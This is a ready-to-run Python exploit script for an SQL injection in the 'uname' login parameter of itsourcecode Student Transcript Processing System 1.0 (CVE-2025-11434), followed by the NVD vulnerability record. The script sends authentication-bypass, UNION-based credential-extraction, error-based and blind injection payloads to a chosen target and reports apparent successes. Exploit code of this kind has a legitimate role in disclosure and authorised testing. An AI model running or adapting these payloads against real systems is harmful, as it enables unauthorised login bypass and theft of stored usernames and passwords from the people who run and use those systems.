CVE-2025-11434

# CVE-2025-11434 - itsourcecode Student Transcript Processing System SQL Injection PoC # Vulnerability: SQL Injection via 'uname' parameter in /login.php # CVSS: 7.3 (HIGH) import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target.com" LOGIN_ENDPOINT = "/login.php" # SQL Injection payloads targeting the 'uname' parameter payloads = [ # Basic authentication bypass "' OR '1'='1' -- ", "' OR '1'='1' #", "admin' -- ", # Union-based injection to extract data "' UNION SELECT 1,2,3 -- ", "' UNION SELECT username,password,3 FROM users -- ", # Error-based injection "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) -- ", # Boolean-based blind injection "' AND 1=1 -- ", "' AND 1=2 -- ", # Time-based blind injection "' AND SLEEP(5) -- ", "' OR SLEEP(5) -- " ] def exploit_sql_injection(target_url, payload): """Send SQL injection payload via the uname parameter""" url = target_url.rstrip('/') + LOGIN_ENDPOINT data = { "uname": payload, "password": "test" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(url, data=data, headers=headers, timeout=10) return response except requests.exceptions.RequestException as e: print(f"[ERROR] Request failed: {e}") return None def main(): print(f"[*] Target: {TARGET_URL}") print(f"[*] Testing SQL injection on parameter: uname") print("-" * 60) for i, payload in enumerate(payloads, 1): print(f"\n[+] Payload #{i}: {payload[:50]}...") response = exploit_sql_injection(TARGET_URL, payload) if response is not None: print(f" Status Code: {response.status_code}") print(f" Response Length: {len(response.text)}") # Check for successful bypass or error messages if "Welcome" in response.text or "Dashboard" in response.text: print(" [!] POSSIBLE AUTHENTICATION BYPASS DETECTED!") if "SQL" in response.text or "syntax" in response.text.lower(): print(" [!] SQL ERROR DETECTED - Vulnerability confirmed!") if "mysql" in response.text.lower() or "database" in response.text.lower(): print(" [!] Database information leaked!") print("\n[*] Scan complete.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-11434", "sourceIdentifier": "[email protected]", "published": "2025-10-08T05:15:32.880", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in itsourcecode Student Transcript Processing System 1.0. Affected is an unknown function of the file /login.php. Executing a manipulation of the argument uname can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:student_transcript_processing_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F6810E15-3D3C-494F-BB66-3A3220A351BA"}]}]}], "references": [{"url": "https://github.com/yihaofuweng/cve/issues/49", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.327371", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327371", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.666746", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}